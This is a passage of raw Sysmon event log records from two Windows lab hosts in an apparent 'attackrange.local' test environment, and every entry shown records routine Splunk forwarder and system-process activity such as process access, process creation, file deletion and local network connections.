07:45:52.711{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F330-60EB-FB7C-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046599Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.711{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046598Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.711{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046597Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.711{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046596Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.711{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046595Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.711{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F330-60EB-FB7C-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046594Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.711{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F330-60EB-FB7C-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046593Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.697{466BC892-F330-60EB-FB7C-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046592Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.463{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4A013AF3AE0DE6E1A33AB4F41737FD76,SHA256=7B03CF5E2930A06A49BB2381DA1C4A4632E01A49307BB8AD0DD1E02D6C1D1AF3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046591Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.079{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F330-60EB-FA7C-00000000CF01}8072C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046590Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.079{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046589Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.079{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046588Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.079{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046587Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.079{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046586Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.079{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F330-60EB-FA7C-00000000CF01}8072C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046585Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.079{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F330-60EB-FA7C-00000000CF01}8072C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046584Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.065{466BC892-F330-60EB-FA7C-00000000CF01}8072C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806388Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:53.427{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B35052B96BFDB4DF82D8B0EB9E811AF,SHA256=8A89854DD0D52E5BE50D71266D8A721AF09999B091AB29A48A9AB20B3FE51267,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046613Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:53.711{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=182BA307A104E82F6A0AE0E847E70D83,SHA256=C465CD60D91C85C6E691909EA7A23E9EB1A6A9D0C43B2A1B9E647582099A4B93,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046612Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:53.629{466BC892-F331-60EB-FC7C-00000000CF01}79768408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046611Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:53.395{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F331-60EB-FC7C-00000000CF01}7976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046610Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:53.380{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F331-60EB-FC7C-00000000CF01}7976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046609Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:53.380{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046608Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:53.380{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046607Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:53.380{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046606Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:53.380{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046605Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:53.380{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F331-60EB-FC7C-00000000CF01}7976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046604Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:53.381{466BC892-F331-60EB-FC7C-00000000CF01}7976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001046603Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:45.680{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50932-false10.0.1.12-8000- 354300x8000000000000000806387Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:51.388{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57177-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806389Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:54.457{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA6D90BBA13B93DD44646E81534558DA,SHA256=7E33C6185A8C769D2F489CCB2D143904E3C6E9B47BA243A2E887ECAABEE95D72,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046622Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:54.079{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F332-60EB-FD7C-00000000CF01}9572C:\Program 